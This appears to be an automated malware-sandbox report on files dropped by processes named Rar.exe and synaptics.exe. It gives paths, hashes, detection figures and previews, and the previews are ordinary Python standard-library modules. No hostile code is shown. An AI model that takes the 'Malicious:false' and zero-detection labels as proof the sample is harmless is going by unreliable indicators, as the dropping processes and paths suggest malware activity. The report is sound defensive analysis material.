                                                                                                                                                                                      Preview:# Copyright (c) 2004 Python Software Foundation...# All rights reserved.....# Written by Eric Price <eprice at tjhsst.edu>..# and Facundo Batista <facundo at taniquetil.com.ar>..# and Raymond Hettinger <python at rcn.com>..# and Aahz <aahz at pobox.com>..# and Tim Peters....# This module should be kept in sync with the latest updates of the..# IBM specification as it evolves. Those updates will be treated..# as bug fixes (deviation from the spec is a compatibility, usability..# bug) and will be backported. At this point the spec is stabilizing..# and the updates are becoming fewer, smaller, and less significant....."""..This is an implementation of decimal floating point arithmetic based on..the General Decimal Arithmetic Specification:.... http://speleotrove.com/decimal/decarith.html....and IEEE standard 854-1987:.... http://en.wikipedia.org/wiki/IEEE_854-1987....Decimal floating point has finite precision with arbitrarily large bounds.....The purpose of this modul
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):97185
                                                                                                                                                                                      Entropy (8bit):4.3648688617698745
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:vi9tkVWSOWuoT4fWEai+6zQWB/5bjhpYgmRA+d:vi9tkU7kuWEai+6cWp5bj3TmRT
                                                                                                                                                                                      MD5:0D371E43F9E94B567CF4701233E240CB
                                                                                                                                                                                      SHA1:516298CDB14B87A60CCD14FC1742BF8F1EE26197
                                                                                                                                                                                      SHA-256:8F2DC04AC4E7281967EC2F124C7CE64CAFF24018A88540AFDE3407A26873589E
                                                                                                                                                                                      SHA-512:B6E175F27F17F9B90857DBABE64601A5674FDBA0A8E8494649A5890024E7C83092D92C2E892573572F5E8CEF854F0021E0F877C90C38179305A3B1589C899E16
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..Python implementation of the io module..."""....import os..import abc..import codecs..import errno..import stat..import sys..# Import _thread instead of threading to reduce startup cost..from _thread import allocate_lock as Lock..if sys.platform in {'win32', 'cygwin'}:.. from msvcrt import setmode as _setmode..else:.. _setmode = None....import io..from io import (__all__, SEEK_SET, SEEK_CUR, SEEK_END)....valid_seek_flags = {0, 1, 2} # Hardwired values..if hasattr(os, 'SEEK_HOLE') :.. valid_seek_flags.add(os.SEEK_HOLE).. valid_seek_flags.add(os.SEEK_DATA)....# open() uses st_blksize whenever we can..DEFAULT_BUFFER_SIZE = 8 * 1024 # bytes....# NOTE: Base classes defined here are registered with the "official" ABCs..# defined in io.py. We don't use real inheritance though, because we don't want..# to inherit the C implementations.....# Rebind for compatibility..BlockingIOError = BlockingIOError....# Does io.IOBase finalizer log the exception if the close() method fails?
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3231
                                                                                                                                                                                      Entropy (8bit):4.290837712719538
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:LCIcLnTrq7B8nUOOU3ciXy0JFBOjpQ8sHLf1vHKGysSO4:LmnTWjOOU3cc0+rxHKGB94
                                                                                                                                                                                      MD5:2E95AAF9BD176B03867862B6DC08626A
                                                                                                                                                                                      SHA1:3AFA2761119AF29519DC3DAD3D6C1A5ABCA67108
                                                                                                                                                                                      SHA-256:924F95FD516ECAEA9C9AF540DC0796FB15EC17D8C42B59B90CF57CFE15962E2E
                                                                                                                                                                                      SHA-512:080495FB15E7C658094CFE262A8BD884C30580FD6E80839D15873F27BE675247E2E8AEC603D39B614591A01ED49F5A07DD2ACE46181F14B650C5E9EC9BB5C292
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""..The objects used by the site module to add custom builtins..."""....# Those objects are almost immortal and they keep a reference to their module..# globals. Defining them in the site module would keep too many references..# alive...# Note this means this module should also avoid keep things alive in its..# globals.....import sys....class Quitter(object):.. def __init__(self, name, eof):.. self.name = name.. self.eof = eof.. def __repr__(self):.. return 'Use %s() or %s to exit' % (self.name, self.eof).. def __call__(self, code=None):.. # Shells like IDLE catch the SystemExit, but listen when their.. # stdin wrapper is closed... try:.. sys.stdin.close().. except:.. pass.. raise SystemExit(code)......class _Printer(object):.. """interactive prompt objects for printing the license text, a list of.. contributors and the copyright notice.""".... MAXLINES = 23.... def __init__(self, name,
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):25856
                                                                                                                                                                                      Entropy (8bit):4.576262974956046
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:C1pVFxVyOs4/p6WSDmyeMjjiIltKcKdrxrTZprdw2W6dNtxz/kNVGC/JrbruMREb:C1FxIO7/p6Woph/5uZTvVrz/g3HuMQCi
                                                                                                                                                                                      MD5:B4CB6BF5E35DC2F8A8D10014F66A72C0
                                                                                                                                                                                      SHA1:8461CA8CFE93FBC0FC385A03428E9B248BE750C7
                                                                                                                                                                                      SHA-256:770CD20E1D9381A3850401868BF1CA375C6BF5AEC7F8E031B6210DF98D789E3F
                                                                                                                                                                                      SHA-512:775762E38D0CA8B954D37DF4BD8CAF76ACD97C3399C0774592D01494A2F2141C2C2EBB4DC29E2A40ACE01A81C46E5EC76FAB9744ABCFDFEC826BDDF83E61B5D2
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Strptime-related classes and functions.....CLASSES:.. LocaleTime -- Discovers and stores locale-specific time information.. TimeRE -- Creates regexes for pattern matching a string of text containing.. time information....FUNCTIONS:.. _getlang -- Figure out what language is being used for the locale.. strptime -- Calculates the time struct represented by the passed-in string...."""..import time..import locale..import calendar..from re import compile as re_compile..from re import IGNORECASE..from re import escape as re_escape..from datetime import (date as datetime_date,.. timedelta as datetime_timedelta,.. timezone as datetime_timezone)..from _thread import allocate_lock as _thread_allocate_lock....__all__ = []....def _getlang():.. # Figure out what the current language is set to... return locale.getlocale(locale.LC_TIME)....class LocaleTime(object):.. """Stores and handles locale-specific information relat
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):7462
                                                                                                                                                                                      Entropy (8bit):4.6221334949688195
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:/RCb6QO/SjgBOiCX1BfaOajqBG2DI0WFwoV4KLgKxDl0D3YzgDPYhFSnRKipzXhH:DQO6kBOiCXSO5BZIr4aCYUsho9R
                                                                                                                                                                                      MD5:2ACCB96019A97C9B237FA45AB4E67BBF
                                                                                                                                                                                      SHA1:E1C573319C6E01E1222EAD90E5C34C58D22021EF
                                                                                                                                                                                      SHA-256:27BB2BD201E6157EFDD807EC5E3F3C5A8E0EA2EA2E86ED475A59DE8C6442A0EB
                                                                                                                                                                                      SHA-512:26F75E0A32F02E85C3258F7B37440FC83C775AB64B31497217A2090228CAE2EF732166B5E07865DDCC0D82FD69CF80EA2F3DA020C7FCA8F09E39390EB768F04D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Thread-local objects.....(Note that this module provides a Python version of the threading.local.. class. Depending on the version of Python you're using, there may be a.. faster one available. You should always import the `local` class from.. `threading`.)....Thread-local objects support the management of thread-local data...If you have data that you want to be local to a thread, simply create..a thread-local object and use its attributes:.... >>> mydata = local().. >>> mydata.number = 42.. >>> mydata.number.. 42....You can also access the local-object's dictionary:.... >>> mydata.__dict__.. {'number': 42}.. >>> mydata.__dict__.setdefault('widgets', []).. [].. >>> mydata.widgets.. []....What's important about thread-local objects is that their data are..local to a thread. If we access the data in a different thread:.... >>> log = [].. >>> def f():.. ... items = sorted(mydata.__dict__.items()).. ... log.append(items).. ... mydata.number = 11.. ... l
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6129
                                                                                                                                                                                      Entropy (8bit):4.19143974100249
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:EBC2FPYi/mDV2/2vGd24QB2oa+qBdXsSP4m4FE8445m4IinbyQqVRA6U4e4nC8C7:ELj/7euM4QgoofXsm4m4FH4484I+byFW
                                                                                                                                                                                      MD5:B63A969483B85C6E81E57B8FABE80F2F
                                                                                                                                                                                      SHA1:8945995094A976581C83455D9ED14F2B81CB7212
                                                                                                                                                                                      SHA-256:5B03D51D4CB46AA7EFFAD1B1ACE0847808E5A43F1EAE7CC9682284A8D0701A76
                                                                                                                                                                                      SHA-512:C4352A0E90FBA11873D4CD61C9E9D978682DB1BBDAB0CFA668F1913DDFD4132791738AFC08EEC931CCC296DAD1B13DB24DBAC8339D235704A7A049AF30683C56
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Access WeakSet through the weakref module...# This code is separated-out because it is needed..# by abc.py to load everything else at startup.....from _weakref import ref..from types import Generiuseras....__all__ = ['WeakSet']......class _IterationGuard:.. # This context manager registers itself in the current iterators of the.. # weak container, such as to delay all removals until the context manager.. # exits... # This technique should be relatively thread-safe (since sets are)..... def __init__(self, weakcontainer):.. # Don't create cycles.. self.weakcontainer = ref(weakcontainer).... def __enter__(self):.. w = self.weakcontainer().. if w is not None:.. w._iterating.add(self).. return self.... def __exit__(self, e, t, b):.. w = self.weakcontainer().. if w is not None:.. s = w._iterating.. s.remove(self).. if not s:.. w._commit_removals()......class Weak
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6710
                                                                                                                                                                                      Entropy (8bit):4.481959964393442
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:gPAaxlPl/yqe//e/2Dkpps4BWt3O0Tml91BbnTLikZOz9Cj9bObNbYGO7U:gPAaxlP1u9kU+0TmnTLikZW9CxbOJbYQ
                                                                                                                                                                                      MD5:3A8E484DC1F9324075F1E574D7600334
                                                                                                                                                                                      SHA1:D70E189BA3A4CF9BEA21A1BBC844479088BBD3A0
                                                                                                                                                                                      SHA-256:A63DE23D93B7CC096AE5DF79032DC2E12778B134BB14F7F40AC9A1F77F102577
                                                                                                                                                                                      SHA-512:2C238B25DD1111EE37A3D7BF71022FE8E6C1D7ECE86B6BBDFA33EE0A3F2A730590FE4BA86CC88F4194D60F419F0FEF09776E5ECA1C473D3F6727249876F00441
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Copyright 2007 Google, Inc. All Rights Reserved...# Licensed to PSF under a Contributor Agreement....."""Abstract Base Classes (ABCs) according to PEP 3119."""......def abstractmethod(funcobj):.. """A decorator indicating abstract methods..... Requires that the metaclass is ABCMeta or derived from it. A.. class that has a metaclass derived from ABCMeta cannot be.. instantiated unless all of its abstract methods are overridden... The abstract methods can be called using any of the normal.. 'super' call mechanisms. abstractmethod() may be used to declare.. abstract methods for properties and descriptors..... Usage:.... class C(metaclass=ABCMeta):.. @abstractmethod.. def my_abstract_method(self, ...):.. ..... """.. funcobj.__isabstractmethod__ = True.. return funcobj......class abstractclassmethod(classmethod):.. """A decorator indicating abstract classmethods..... Deprecated, use 'classmethod' with 'ab
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):33552
                                                                                                                                                                                      Entropy (8bit):4.4638619417349945
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:Ob3TMIq3JHejezqFTYQjJFUT2uXUmwlKje3W73igkZIS3WXpRY:4MHpejezqF0gAT2u/NK3W7Dk9cY
                                                                                                                                                                                      MD5:BF5911BEAF58D01F1317D4416B929EED
                                                                                                                                                                                      SHA1:4D6191C34468BCDEDBDFF0CFE1EB7F44A83BAB27
                                                                                                                                                                                      SHA-256:2EFBA033EF47B3E19DBCDCB6762B9B49AB1982EAE3B9D649548D15AFADC78DAF
                                                                                                                                                                                      SHA-512:B88E727115CEFDFD31498370DACD7FF3ADBF3BD511B06367CB6A9513B5419A6B1A2A83822561E11BF6B41BC6A7AFED4ACBFC542F18CAFE18E741E576380E234D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Stuff to parse AIFF-C and AIFF files.....Unless explicitly stated otherwise, the description below is true..both for AIFF-C files and AIFF files.....An AIFF-C file has the following structure..... +-----------------+.. | FORM |.. +-----------------+.. | <size> |.. +----+------------+.. | | AIFC |.. | +------------+.. | | <chunks> |.. | | . |.. | | . |.. | | . |.. +----+------------+....An AIFF file has the string "AIFF" instead of "AIFC".....A chunk consists of an identifier (4 bytes) followed by a size (4 bytes,..big endian order), followed by the data. The size field does not include..the size of the 8 byte header.....The following chunk types are recognized..... FVER.. <version number of AIFF-C defining document> (AIFF-C only)... MARK.. <# of markers> (2 bytes).. list of markers:.. <marker ID> (2 bytes, must be > 0).. <position> (4 bytes).. <marker nam
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):517
                                                                                                                                                                                      Entropy (8bit):5.2580863991460935
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:HHoBI/BiIkjuVyGkjvluzAbx1uVEiE9rBX2y:HzJiOVyGkRuYSkVX2y
                                                                                                                                                                                      MD5:3ED5C3D928783BE91A9C8FCA6BCB846E
                                                                                                                                                                                      SHA1:2104F146AA389C6FC4BF172A082A711F9515A1EE
                                                                                                                                                                                      SHA-256:2C4879A527D2F5D0E0F0D81837EEB8510E2F77FDF2BBB2688835732E699CCD6A
                                                                                                                                                                                      SHA-512:2BC5200EF030A876C374AD3A31D189777C3C57759C6DB0BAB3C33265BB74ADD2FDDAAE20EDC646A7722386934D093C47C42CFC8AF24A5340C7D8D926A9D3505F
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:..import webbrowser..import hashlib....webbrowser.open("https://xkcd.com/353/")....def geohash(latitude, longitude, datedow):.. '''Compute geohash() using the Munroe algorithm..... >>> geohash(37.421542, -122.085589, b'2005-05-26-10458.68').. 37.857713 -122.544543.... '''.. # https://xkcd.com/426/.. h = hashlib.md5(datedow, usedforsecurity=False).hexdigest().. p, q = [('%f' % float.fromhex('0.' + x)) for x in (h[:16], h[16:32])].. print('%d%s %d%s' % (latitude, p[1:], longitude, q[1:]))..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):101137
                                                                                                                                                                                      Entropy (8bit):4.306533315342896
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:g3gKb2hiBVRLsxQ4vu6ilEy14udYC91vhjJFGD8:gQKb2hiBVabu6ilEy14udx1vJJFGA
                                                                                                                                                                                      MD5:5CDD2DD02315B6DD0F093C4D785E3D96
                                                                                                                                                                                      SHA1:06057E30C7F3E7804070A90739C3577FFB9B5AD6
                                                                                                                                                                                      SHA-256:D30F7E5CA4A44F7BA9F1626E984B7099B42FEB603B9BA8E31635D9C889793EC1
                                                                                                                                                                                      SHA-512:10D6E90BC739158597CF8AEA1616D8B02C2B72AD8EFADE9B3668A952179CC2A9AB5B92EDECB174821556F52EA0A9081575C90D2016DBFF6175D1F3E0A0F2284D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# Author: Steven J. Bethard <steven.bethard@gmail.com>...# New maintainer as of 29 August 2019: Raymond Hettinger <raymond.hettinger@gmail.com>...."""Command-line parsing library....This module is an optparse-inspired command-line parsing library that:.... - handles both optional and positional arguments.. - produces highly informative usage messages.. - supports parsers that dispatch to sub-parsers....The following is a simple usage example that sums integers from the..command-line and writes the result to a file::.... parser = argparse.ArgumentParser(.. description='sum the integers at the command line').. parser.add_argument(.. 'integers', metavar='int', nargs='+', type=int,.. help='an integer to be summed').. parser.add_argument(.. '--log', default=sys.stdout, type=argparse.FileType('w'),.. help='the file where the sum should be written').. args = parser.parse_args().. args.log.write('%s' % sum(args.integers)).. args.lo
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):61609
                                                                                                                                                                                      Entropy (8bit):4.417126699054812
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:pZuW0/yNX9e8T1Y+XqfdAyr8+gliw1RaDh1:pZnMyNX9/qeyI+glN1s1
                                                                                                                                                                                      MD5:38ECD2B58AF252AC5A2D14A5AC17333B
                                                                                                                                                                                      SHA1:F5EC2EE9D098AF6432017029E2B14B0230581ADF
                                                                                                                                                                                      SHA-256:A1D8E96B987376D7E0CE57587830EBAA7E06509EA528D666B409D5604D1EAA8D
                                                                                                                                                                                      SHA-512:BACE88F6DA88662BBC5A49E6617478553C2FE287CE1D46CCA77483F63FBE82849EBA45824CEE7AA57FF4F820F1024E331AF51FE46E353535D9D68160DA424848
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:""".. ast.. ~~~.... The `ast` module helps Python applications to process trees of the Python.. abstract syntax grammar. The abstract syntax itself might change with.. each Python release; this module helps to find out programmatically what.. the current grammar looks like and allows modifications of it..... An abstract syntax tree can be generated by passing `ast.PyCF_ONLY_AST` as.. a flag to the `compile()` builtin function or by using the `parse()`.. function from this module. The result will be a tree of objects whose.. classes all inherit from `ast.AST`..... A modified abstract syntax tree can be compiled into a Python code object.. using the built-in `compile()` function..... Additionally various helper functions are provided that make working with.. the trees simpler. The main intention of the helper functions and this.. module in general is to provide an easy to use interface for libraries.. that work tightly with the python sy
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):11835
                                                                                                                                                                                      Entropy (8bit):4.533400669114703
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:jrq3jJ1vi4b1/AwyG5XcoIhlJCmO7IDzAEyeWdm2aIb:fq3jJRthARG9comK7KzAEyeWdm4
                                                                                                                                                                                      MD5:A089EF65FD800EEB88D57F8752C14409
                                                                                                                                                                                      SHA1:31ADE2E4DEDE4D6B60CCA9A484858A5552A0E533
                                                                                                                                                                                      SHA-256:8F64AACF08D17F0D9EE51BBB540A5D2662ACB0F7C68009E895AC39D8973039A4
                                                                                                                                                                                      SHA-512:8D3DC6975E0DA00046C867E77D5C33D3197A7D4A5E5CECD43DC31B35C4D32B300BB3201A82AF4919A6A084A3540AD61DEC521DE7F405742BF6C323AA5047F6B9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- Mode: Python; tab-width: 4 -*-..# Id: asynchat.py,v 2.26 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, IND
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):20917
                                                                                                                                                                                      Entropy (8bit):4.558999571418994
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:zrq3jJ1mtqOelBAVAWAm8HA2F13/29sq98ousJ9/k/u6QkAl+o/T1E06xkScEu9n:vq3jJwtq9lAAFAWzi1BSBk5
                                                                                                                                                                                      MD5:392F12822B5A0A36504480D5B7DFC034
                                                                                                                                                                                      SHA1:9180B8AA149971D3F96C7343F01307E3092A8A59
                                                                                                                                                                                      SHA-256:8045DAC420E2A61BBA0474613F93282912A521AADDC027589158459DA2092469
                                                                                                                                                                                      SHA-512:29F03D5411E003EC617CCB1B925A5C578B4BCD77FD34B6DE16EA592047975EED8FEDECD1C7E86082D3817B0A522436E93DB846025C72B33BBA9472D79EDD0E67
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:# -*- Mode: Python -*-..# Id: asyncore.py,v 2.51 2000/09/07 22:29:26 rushing Exp..# Author: Sam Rushing <rushing@nightmare.com>....# ======================================================================..# Copyright 1996 by Sam Rushing..#..# All Rights Reserved..#..# Permission to use, copy, modify, and distribute this software and..# its documentation for any purpose and without fee is hereby..# granted, provided that the above copyright notice appear in all..# copies and that both that copyright notice and this permission..# notice appear in supporting documentation, and that the name of Sam..# Rushing not be used in advertising or publicity pertaining to..# distribution of the software without specific, written prior..# permission...#..# SAM RUSHING DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,..# INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN..# NO EVENT SHALL SAM RUSHING BE LIABLE FOR ANY SPECIAL, INDIRECT OR..# CONSEQUENT
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):21450
                                                                                                                                                                                      Entropy (8bit):4.817384784161953
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:j+uTwvnidNdYaBM+3m8dvd936r34MJIz5V1d:9EANdlBM+3m8dvd936kfz57d
                                                                                                                                                                                      MD5:430BEF083EDC3857987FA9FDFAD40A1B
                                                                                                                                                                                      SHA1:53BD3144F2A93454D747A765AC63F14056428A19
                                                                                                                                                                                      SHA-256:2BDCB6D9EDFD97C91BC8AB325FCC3226C71527AA444ADB0A4ED70B60C18C388D
                                                                                                                                                                                      SHA-512:7C1B8EA49BA078D051F6F21F99D8E51DC25F790E3DAFF63F733124FC7CF89417A75A8F4565029B1F2EB17F545250E1087F04ECB064022907D2D59F6430912B3A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:#! /usr/bin/env python3...."""Base16, Base32, Base64 (RFC 3548), Base85 and Ascii85 data encodings"""....# Modified 04-Oct-1995 by Jack Jansen to use binascii module..# Modified 30-Dec-2003 by Barry Warsaw to add full RFC 3548 support..# Modified 22-May-2007 by Guido van Rossum to use bytes everywhere....import re..import struct..import binascii......__all__ = [.. # Legacy interface exports traditional RFC 2045 Base64 encodings.. 'encode', 'decode', 'encodebytes', 'decodebytes',.. # Generalized interface for other encodings.. 'b64encode', 'b64decode', 'b32encode', 'b32decode',.. 'b32hexencode', 'b32hexdecode', 'b16encode', 'b16decode',.. # Base85 and Ascii85 encodings.. 'b85encode', 'b85decode', 'a85encode', 'a85decode',.. # Standard Base64 encoding.. 'standard_b64encode', 'standard_b64decode',.. # Some common Base64 alternatives. As referenced by RFC 3458, see thread.. # starting at:.. #.. # http://zgp.org/pipermail/p2p-hackers/2001-September/00
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):48466
                                                                                                                                                                                      Entropy (8bit):5.122325300143825
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:1bRUurnFDpytMbeGzDRBPou+eQyWImBfbGm49WxxSNo4Q+M2PvUPPAeOTMtJcCnM:RRtFDpyTGzDRBPoJImBfbGm49WxENbQ8
                                                                                                                                                                                      MD5:D534A846CC1CFBD5889D485066EA9B1F
                                                                                                                                                                                      SHA1:58DF6A8E86CB20F93FEB5B6E12D13CDF0C1A9530
                                                                                                                                                                                      SHA-256:F8DA37FD833C794A450A9356AFB9DA4C34089BA30EB2E4845DC1B58C6264D3CD
                                                                                                                                                                                      SHA-512:039FAAD32CE4CF831DFD6F5AC57D2EC04DEE708A3411CF92B8727E44425A9E61241C5B776DB61A6084314E8AB6B27817738C1CC9AF6D7B58683DD3E2C4C74D14
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.m.Z...W.n...e.yO......Y.n.w.e.j...e.....z.d.d.l.m.Z...W.n...e.yg......Y.n.w.G.d.d...d.e.j ..Z!G.d.d...d.e.j"..Z#G.d.d...d.e.j$..Z%G.d.d...d.e&..Z'G.d.d...d.e(..Z)z.d.d.l.m)Z)..W.n...e.y.......Y.n.w.z.d.d.l.m*Z*..W.n...e.y.......d.d...Z*Y.n.w.d.d.d.d...d.d...Z+d d!..Z,z.d.d"l.m,Z,..W.n...e.y.......Y.n.w.G.d#d$..d$e(..Z-G.d%d&..d&e.j...Z/G.d'd(..d(e.j...Z0G.d)d*..d*e.j...Z1G.d+d,..d,e.j2..Z3d.S.)-a?...This module implements specialized container datatypes providing.alternatives to Python's general purpose built-in containers, dict,.list, set, and tuple...* namedtuple factory function for creating tuple subclasses with named fields.* deque list-like container with fast appends and pops on either end.* ChainMap dict-like class for creating a single view of multiple mappings.* Counter dict subclass
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):251
                                                                                                                                                                                      Entropy (8bit):4.825708846798739
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:6:y/jcteC5VvkFZlaE+MdF/Hj5J+soZAuaHxEMntGdgIun:CoeC7gj+Er+so+VltGdcn
